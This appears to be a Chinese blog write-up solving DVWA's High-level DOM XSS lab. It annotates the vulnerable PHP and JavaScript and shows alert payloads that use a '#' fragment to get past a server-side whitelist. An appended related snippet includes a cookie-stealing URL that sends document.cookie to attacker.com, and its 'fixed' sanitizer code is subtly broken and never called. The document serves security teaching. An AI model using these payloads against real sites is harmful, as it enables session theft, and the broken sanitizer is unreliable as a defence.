DVWA靶场通关笔记-XSS DOM(High级别)

于 2025-07-13 13:31:25 发布
阅读量1.2k 收藏 14
点赞数 35
CC 4.0 BY-SA版权
分类专栏: DVWA靶场 文章标签: DVWA靶场 XSS漏洞 DOM型XSS XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/148017682

目录

一、XSS

二、DOM型XSS

三、代码分析

1、index.php

2、High.php

3、渗透思路

四、渗透实战

1、渗透准备

2、采用Script标签绕过

3、采用IMG标签绕过

DVWA(Damn Vulnerable Web Application)中的 XSS DOM关卡是用于练习和演示 DOM XSS的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对高等级别(High)关卡进行渗透实战。

一、XSS

XSS(Cross-Site Scripting) 指的是攻击者通过在网页中注入恶意脚本,当用户访问该页面时,脚本会在用户浏览器中执行,从而窃取用户数据、会话信息或进行其他恶意操作。核心原理就是未对用户输入或输出进行适当过滤,导致恶意代码被浏览器解析执行。

XSS类型

位置

数据流向

反射型 XSS

服务器端

用户输入 → 服务器 → 响应中包含恶意代码

存储型 XSS

服务器端

用户输入 → 存储(数据库) → 所有用户访问时触发

DOM XSS

客户端 JavaScript 代码

用户输入 → 浏览器 DOM 操作 → 执行恶意代码

二、DOM型XSS

DOM 型 XSS(Document Object Model Cross-Site Scripting) 是一种特殊的 XSS 攻击,其注入点存在于客户端 JavaScript 代码中,而非服务器端。攻击者通过操控网页的 DOM 环境(如 URL 参数、表单输入等),诱导浏览器执行恶意脚本,无需服务器参与。

方面普通XSSDOM XSS
检测工具传统扫描工具可分析HTTP响应内容需动态分析JS代码和DOM操作
防御位置服务器端过滤(如转义<>客户端转义 + 避免危险的DOM操作
WAF防护可通过拦截恶意HTTP请求防御通常无效(攻击数据可能不发送到服务器)

三、代码分析

1、index.php

进入DVWA靶场源目录,找到index.php源码。

这段代码是DVWA(Damn Vulnerable Web Application)中DOM型XSS的演示页面,主要功能是:

  • 根据用户选择的语言生成一个下拉菜单。
  • 当用户提交选择后,URL中会包含default=参数。
  • 页面JavaScript会读取URL参数并动态生成选项。

 详细注释后的代码如下所示。

<?php
// 设置根目录路径
define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
// 引入DVWA页面初始化文件
require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php';

// 启动页面,要求认证和PHPIDS保护
dvwaPageStartup( array( 'authenticated', 'phpids' ) );

// 创建新页面
$page = dvwaPageNewGrab();
// 设置页面标题
$page[ 'title' ]   = 'Vulnerability: DOM Based Cross Site Scripting (XSS)' . $page[ 'title_separator' ].$page[ 'title' ];
$page[ 'page_id' ] = 'xss_d';
$page[ 'help_button' ]   = 'xss_d';
$page[ 'source_button' ] = 'xss_d';

// 连接数据库
dvwaDatabaseConnect();

// 根据安全等级选择对应的级别文件
$vulnerabilityFile = '';
switch( $_COOKIE[ 'security' ] ) {
    case 'low':
        $vulnerabilityFile = 'low.php';
        break;
    case 'medium':
        $vulnerabilityFile = 'medium.php';
        break;
    case 'high':
        $vulnerabilityFile = 'high.php';
        break;
    default:
        $vulnerabilityFile = 'impossible.php';
        break;
}

// c
require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/xss_d/source/{$vulnerabilityFile}";

// 对于impossible级别,不进行URI解码
$decodeURI = "decodeURI";
if ($vulnerabilityFile == 'impossible.php') {
    $decodeURI = "";
}

// 构建页面主体
$page[ 'body' ] = <<<EOF
<div class="body_padded">
    <h1>Vulnerability: DOM Based Cross Site Scripting (XSS)</h1>

    <div class="vulnerable_code_area">
        <p>Please choose a language:</p>

        <form name="XSS" method="GET">
            <select name="default">
                <script>
                    // 检查URL中是否包含default参数
                    if (document.location.href.indexOf("default=") >= 0) {
                        // 提取default参数值
                        var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
                        // 动态写入选项
                        document.write("<option value='" + lang + "'>" + $decodeURI(lang) + "</option>");
                        document.write("<option value='' disabled='disabled'>----</option>");
                    }
                        
                    // 写入固定选项
                    document.write("<option value='English'>English</option>");
                    document.write("<option value='French'>French</option>");
                    document.write("<option value='Spanish'>Spanish</option>");
                    document.write("<option value='German'>German</option>");
                </script>
            </select>
            <input type="submit" value="Select" />
        </form>
    </div>
EOF;

// 添加更多信息链接
$page[ 'body' ] .= "
    <h2>More Information</h2>
    <ul>
        <li>" . dvwaExternalLinkUrlGet( 'https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)' ) . "</li>
        <li>" . dvwaExternalLinkUrlGet( 'https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)' ) . "</li>
        <li>" . dvwaExternalLinkUrlGet( 'https://www.acunetix.com/blog/articles/dom-xss-explained/' ) . "</li>
    </ul>
</div>\n";

// 输出页面
dvwaHtmlEcho( $page );

?>

2、High.php

打开源码High.php,分析可知这段代码使用switch方法的白名单过滤了XSS注入,如下所示。

分析代码,当前防护措施如下所示。

  • 参数检查:检查URL中是否存在default参数(如?default=English),且值不为null
  • 白名单验证:只允许FrenchEnglishGermanSpanish四个值,其他值会触发重定向到默认英语选项。
  • 防御性设计:通过白名单强制无效输入回退到安全默认值,避免不可控输入。

详细注释后的源码如下所示。

<?php
// 检查是否存在名为"default"的GET参数且其值不为null
if (array_key_exists("default", $_GET) && !is_null($_GET['default'])) {
    
    # 白名单允许的语言选项
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # 如果是白名单中的语言,不做任何操作,继续执行后续代码
            break;
        default:
            # 如果不在白名单中,重定向到?default=English
            header("location: ?default=English");
            exit; // 终止脚本执行
    }
}
?>

3、渗透思路

由于源码器使用了switch白名单的方式,判断参数中的值是不是所规定的四种(FrenchEnglishGermanSpanish),所以服务端是无法通过除此之外的其他内容绕过。

但还有一种绕过方式:

  • 使用#符号来使URL传入内容被截断,URL栏的 # 号之后的内容并不会发送至服务器端
  • 但是js语言中#号并不会被截断,会使得default传入的所有内容都会完整传入。

综上,当注入语句配置为“白名单的四个词+空格+#+原始注入语句”时,就可以实现URL白名单绕过,js可以传入完整的注入语句,从而实现$_GET['default']传递的值刚刚好为白名单内的值,使绕过验证,又实现了前端加载攻击语句。

四、渗透实战

1、渗透准备

配置security为High级别,如下所示。

进入DVWA靶场XSS DOM关卡High级别,选择English,此时完整URL地址如下所示。

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English

2、采用Script标签绕过

尝试注入XSS语句<script>alert('mooyuan')</script>,参考Low关卡,注入语句仍为<script>alert('mooyuan')</script>,针对本关卡,注入语句前增加French空格#号,注入语句如下所示。

French #<script>alert('mooyuan')</script>

3、采用IMG标签绕过

尝试注入XSS语句<img src=0 οnerrοr=alert('mooyuan')>,参考Medium关卡,构造单select闭合,语句变为</select><img src=0 οnerrοr=alert('mooyuan')>。针对本关卡,注入语句前增加English空格#号,注入语句如下所示。

English #</select><img src=0 onerror=alert('mooyuan')>

DVWA靶场xss通关笔记,详解带截图
AboutLzs的博客
03-21 1773
DVWA靶场Xss通关笔记
DVWA靶场通关(2023)
2301_80548709的博客
02-23 2802
1.这道题是爆破用户名,以及密码,其实就是通过burp软件来爆破抓包成功!接下来爆破修改这两个值,进行爆破,正确导入字典后,开始爆破.因为已经知道了答案,我们可以让爆破的数量少一点,找到数量不一致的,得到结果2.第二种,主要区别在于我们必须休眠两秒,才能继续.所以让它休眠2000ms就欧克了为了方便,我就将正确答案置于了顶端,可以发现,我们的爆破可以保证全为200的状态码3.第三题,通过查询得到,主要增加了token值,这个东西。
DVWA靶场通关笔记-XSS DOM(Medium级别)
mooyuan的网络安全博客
07-13 957
DVWA(Damn Vulnerable Web Application)中的 XSS DOM关卡是用于练习和演示 DOM XSS的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对中等级别(Medium)关卡进行渗透实战。
DVWA靶场通关笔记-反射XSS(Reflected Medium级别)
mooyuan的网络安全博客
07-11 858
DVWA(Damn Vulnerable Web Application)中的反射XSS关卡(Reflected)是用于练习和演示反射XSS的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对中等级别的关卡进行渗透实战。
DVWA靶场通关笔记-反射XSS(Reflected Low级别)
mooyuan的网络安全博客
07-11 776
DVWA(Damn Vulnerable Web Application)中的 反射XSS关卡(Reflected)是用于练习和演示反射XSS的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对低等级别的关卡进行渗透实战。
DVWA靶场通关笔记-XSS DOM(Low级别)
mooyuan的网络安全博客
07-12 1134
DVWA(Damn Vulnerable Web Application)中的 XSS DOM关卡是用于练习和演示 DOM XSS的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对低等级别的关卡进行渗透实战。
DVWA靶场通关笔记-反射XSS(Reflected High级别)
mooyuan的网络安全博客
07-12 1068
DVWA(Damn Vulnerable Web Application)中的反射XSS关卡(Reflected)是用于练习和演示反射XSS的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本文对高等级别High)的关卡进行渗透实战。
DVWA靶场通关手册(万字图文解析)
Blanks的博客
01-18 3829
DVWA靶场通关手册(万字图文解析),通过教程+知识点总结复习,干货满满,快快收藏!!
DVWA通关笔记-靶场安装教程
mooyuan的网络安全博客
05-24 1138
本系列为通过《DVWA靶场通关笔记》的渗透笔记合集,本文详细讲解DVWA靶场的安装方法,包括靶场简介、安装过程、常见安装问题解决思路以及登录靶场的注意事项。
DVWA靶场通关XSS
m0_56010012的博客
03-22 1万+
XSS漏洞 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,缩写:CSS)混淆,所以架构跨站脚本攻击缩写为XSSXSS就是攻击者在web页面插入恶意的Script代码,当用户浏览该页面时,嵌入其中的js代码会被执行,从而达到恶意攻击的目的。某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚
DVWA级别通关教程
热门推荐
weixin_52515588的博客
03-26 10万+
首先选择难度,我们从low开始,如上图所示进行修改 目录 SQL手工注入 过程: low Medium high Impossible SQL 盲注 过程: SQL 工具注入 工具安装过程: 过程: low Medium High: 暴力破解 过程: Low Medium High Impossible 命令注入 过程: Low Medium High: Impossible 文件上传 过程: Low Medium High Im...
通过DVWA学习反射XSS漏洞
Mi1k7ea
03-04 5000
XSS,全称cross-site scripting,是用于攻击Web客户端而不是服务器端,其最大的特点是能把恶意的JS或HTML代码注入到用户浏览的网页上。而XSS漏洞的存在,主要是由于Web应用程序对用户的输入没有进行严格的过滤所导致的,当攻击者把恶意代码注入到网页时,用户只要访问该网页就会执行其中的恶意代码。关于其更具体的描述在网上也很多资料这里就不多说了直接进行总结整合。 XSS漏洞
langchain4j-anthropic-spring-boot-starter-0.31.0.jar中文文档.zip
07-26
1、压缩文件中包含: 中文文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
TMS320F28335电机控制程序详解:BLDC、PMSM无感有感及异步VF源代码与开发资料
07-26
TMS320F28335这款高性能数字信号处理器(DSP)在电机控制领域的应用,涵盖了BLDC(无刷直流电机)、PMSM(永磁同步电机)的无感有感控制以及异步VF(变频调速)程序。文章不仅解释了各类的电机控制原理,还提供了完整的开发资料,包括源代码、原理图和说明文档,帮助读者深入了解其工作原理和编程技巧。 适合人群:从事电机控制系统开发的技术人员,尤其是对TMS320F28335感兴趣的工程师。 使用场景及目标:适用于需要掌握TMS320F28335在不同电机控制应用场景下具体实现方法的专业人士,旨在提高他们对该微控制器的理解和实际操作能力。 其他说明:文中提供的开发资料为读者提供了从硬件到软件的全面支持,有助于加速项目开发进程并提升系统性能。
基于爬山搜索法的风力发电MPPT控制Simulink仿真:定步长与变步长算法性能对比 - 爬山搜索法 最新版
07-26
基于爬山搜索法的风力发电最大功率点追踪(MPPT)控制的Simulink仿真模,重点比较了定步长和变步长算法在不同风速条件下的表现。文中展示了两种算法的具体实现方法及其优缺点。定步长算法虽然结构简单、计算量小,但在风速突变时响应较慢,存在明显的稳态振荡。相比之下,变步长算法能够根据功率变化动态调整步长,表现出更快的响应速度和更高的精度,尤其在风速突变时优势明显。实验数据显示,变步长算法在风速从8m/s突增至10m/s的情况下,仅用0.3秒即可稳定,功率波动范围仅为±15W,而定步长算法则需要0.8秒,功率波动达到±35W。 适合人群:从事风力发电研究的技术人员、对MPPT控制感兴趣的工程技术人员以及相关专业的高校师生。 使用场景及目标:适用于风力发电系统的设计与优化,特别是需要提高系统响应速度和精度的场合。目标是在不同风速条件下,选择合适的MPPT算法以最大化风能利用率。 其他说明:文章还讨论了定步长算法在风速平稳情况下的优势,提出了根据不同应用场景灵活选择或组合使用这两种算法的建议。
基于MatlabSimulink的风电场调频策略研究:虚拟惯性、超速减载与下垂控制的协调优化
最新发布
07-27
内容概要:本文详细探讨了在Matlab/Simulink环境下,针对风电场调频的研究,尤其是双馈风机调频策略的应用及其与其他调频策略的协调工作。文中介绍了三种主要的调频策略——虚拟惯性、超速减载和下垂控制,并基于三机九节点系统进行了改进,模拟了四组风电机组的协同调频过程。研究指出,虚拟惯性的应用虽然可以提供短期频率支持,但也可能导致频率二次跌落的问题。因此,需要通过超速减载和下垂控制来进行补偿,以维持电网的稳定。此外,文章还展示了在变风速条件下,风电机组对电网频率支撑能力的显著提升,尤其是在高比例风电并网渗透的情况下,频率最低点提高了50%,验证了调频策略的有效性。 适合人群:从事电力系统、风电场运营管理和调频技术研发的专业人士,以及对风电调频感兴趣的科研人员和技术爱好者。 使用场景及目标:适用于希望深入理解风电场调频机制及其优化方法的人群。目标是掌握不同调频策略的工作原理及其协调工作的关键点,提高风电场的运行效率和稳定性。 其他说明:本文通过具体的案例研究和仿真数据,展示了调频策略的实际效果,强调了合理运用调频策略对于风电场稳定运行的重要意义。同时,也为未来的风电调频技术创新提供了理论依据和实践经验。
三菱QL系列PLC在3C-FPC组装机中的定位与伺服控制及触摸屏应用解析
07-26
三菱Q系列和L系列PLC在3C-FPC组装机中的具体应用,涵盖硬件架构、软件编程以及实际操作技巧。主要内容包括:使用QX42数字输入模块和QY42P晶体管输出模块进行高效信号处理;采用JE系列伺服控制系统实现高精度四轴联动;利用SFC(顺序功能图)和梯形图编程方法构建稳定可靠的控制系统;通过触摸屏实现多用户管理和权限控制;并分享了一些实用的调试和维护技巧,如流水线节拍控制和工程师模式进入方法。最终,该系统的设备综合效率(OEE)达到了92%以上。 适合人群:从事自动化控制领域的工程师和技术人员,尤其是对三菱PLC有初步了解并希望深入了解其高级应用的人群。 使用场景及目标:适用于需要高精度、高效能的工业生产设备控制场合,旨在帮助用户掌握三菱PLC及其相关组件的应用技能,提高生产效率和产品质量。 其他说明:文中提供了详细的编程实例和操作指南,有助于读者更好地理解和实践。同时提醒使用者在调试过程中应注意伺服刚性参数调整,避免不必要的机械损伤。
Simulink环境下四永磁同步电机偏差耦合转速同步控制仿真模及其应用
07-26
内容概要:本文介绍了作者在Simulink上搭建的一个用于四永磁同步电机偏差耦合转速同步控制的仿真模。文中详细描述了四永磁同步电机系统的建模方法,包括电机本体、电源、控制器等组成部分的设置。重点阐述了偏差耦合转速同步控制策略的具体实现方式,即利用PID控制器调节各电机的转速差值,确保所有电机能以相同的速率运转。此外,还展示了不同工况下仿真的实验结果,证明了所提方案的有效性。最后讨论了该模在未来可能的发展方向和应用场景。 适合人群:从事工业自动化领域的研究人员和技术人员,特别是关注多电机系统协调控制的研究者。 使用场景及目标:适用于希望深入了解多电机同步控制机制的人群,旨在提供一种有效的解决方案来应对多电机系统中存在的协调难题,提升系统的稳定性和效率。 其他说明:文中提供了具体的MATLAB/Simulink代码片段作为参考,便于读者理解和复现相关工作。
电机过调制算法模:从线性调制区到过调制区的技术验证与应用
07-26
电机过调制算法模,涵盖从线性调制区到过调制区的转换机制及其在量产车中的实际应用。首先解释了调制区的判定方法,特别是关键阈值的选择依据。接着深入探讨了过调制Ⅰ区的削波和角度补偿策略,以及过调制Ⅱ区采用的六边形调制方式。文中还提到了滞回切换逻辑的应用,以减少转矩脉动,并强调了高精度运算对于算法稳定性的至关重要性。 适合人群:从事电机控制系统研究与开发的技术人员,尤其是关注永磁同步电机驱动器性能优化的专业人士。 使用场景及目标:适用于需要深入了解电机调制算法的工作原理和技术细节的研究人员和工程师,旨在提高电机效率并解决实际工程中遇到的问题。 其他说明:文章不仅提供了理论分析,还包括具体的代码实现片段,有助于读者更好地理解和实践相关技术。同时提醒开发者注意实际应用中的细微差别和潜在挑战。
dvwa靶场通关教程xssdom
06-30
### DVWA靶场XSS (DOM)漏洞的利用教程 在DVWA(Damn Vulnerable Web Application)靶场环境中,XSS (DOM)漏洞是一种基于客户端的跨站脚本攻击形式。与反射和存储XSS不同,DOMXSS不依赖服务器端的数据处理,而是通过浏览器对DOM(文档对象模)的操作来触发恶意脚本执行。 #### 漏洞原理 DOMXSS的核心在于应用程序使用了不可信的数据源来动态修改页面内容。例如,JavaScript可能会从URL参数、表单输入或其他用户提供的数据中提取信息,并将其直接插入到DOM中。如果这些数据没有经过适当的编码或过滤,攻击者可以注入恶意脚本,从而在受害者的浏览器中执行[^2]。 #### 常见触发点 - **URL参数**:如`window.location.hash`、`document.URL`等。 - **用户输入**:如文本框、下拉菜单选择等。 - **本地存储**:如`localStorage`、`sessionStorage`中的数据。 #### 利用步骤 1. **分析目标页面**: 打开DVWA靶场中的XSS (DOM)模块,观察页面行为。通常,该页面会根据URL参数(如`default`)来设置某些页面元素的内容。例如,以下代码片段展示了如何将URL参数传递给前端并修改DOM: ```javascript var pos = document.URL.indexOf("default=") + 8; var lang = document.URL.substring(pos, document.URL.length); document.write("<option value='" + lang + "'>" + decodeURIComponent(lang) + "</option>"); ``` 这段代码直接从URL中提取参数并写入页面,未进行任何安全处理,因此存在DOMXSS漏洞[^3]。 2. **构造恶意输入**: 攻击者可以通过构造特定的URL来注入恶意脚本。例如,假设目标页面允许通过`default`参数控制下拉菜单选项,攻击者可以构造如下URL: ``` http://dvwa/vulnerabilities/xss_d/#!%22%3E%3Cscript%3Ealert('xss')%3C/script%3E ``` 当用户访问此链接时,浏览器会解析并执行嵌入的JavaScript代码,弹出一个警告框,显示“xss”。 3. **窃取Cookie**: 更高级的攻击可能涉及窃取用户的敏感信息,如Cookie。攻击者可以构造一个包含恶意脚本的URL,将用户的Cookie发送到远程服务器: ``` http://dvwa/vulnerabilities/xss_d/#!%22%3E%20%3Cscript%3Edocument.location='http://attacker.com/steal?cookie='+document.cookie;%3C/script%3E ``` 在这个例子中,当用户访问该链接时,浏览器会将当前页面的Cookie作为查询参数附加到`http://attacker.com/steal`上,攻击者可以在服务器日志中捕获这些信息[^2]。 4. **防御措施** - **避免直接操作DOM**:尽量减少使用`document.write()`或`innerHTML`等方法,改用更安全的方式更新页面内容。 - **对输入进行编码**:确保所有用户输入在插入到HTML、JavaScript或URL中之前都进行了适当的编码。 - **使用CSP(内容安全策略)**:通过设置HTTP头`Content-Security-Policy`,限制页面只能加载指定来源的脚本,防止未经授权的脚本执行。 #### 示例代码 以下是一个简单的DOMXSS漏洞示例及其修复方案: ##### 存在漏洞的代码 ```html <script> var hash = window.location.hash.substring(1); document.getElementById("content").innerHTML = hash; </script> <div id="content"></div> ``` ##### 修复后的代码 ```html <script> function sanitizeInput(input) { return input.replace(/[&<>"'`]/g, function(match) { return ({ '&': '&', '<': '<', '>': '>', '"': '"', "'": ''', '`': '`' })[match]; }); } var hash = window.location.hash.substring(1); document.getElementById("content").textContent = hash; </script> <div id="content"></div> ``` 在修复后的代码中,使用了`textContent`属性代替`innerHTML`,并且添加了一个简单的输入清理函数`sanitizeInput`,以防止特殊字符被解释为HTML或JavaScript代码。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值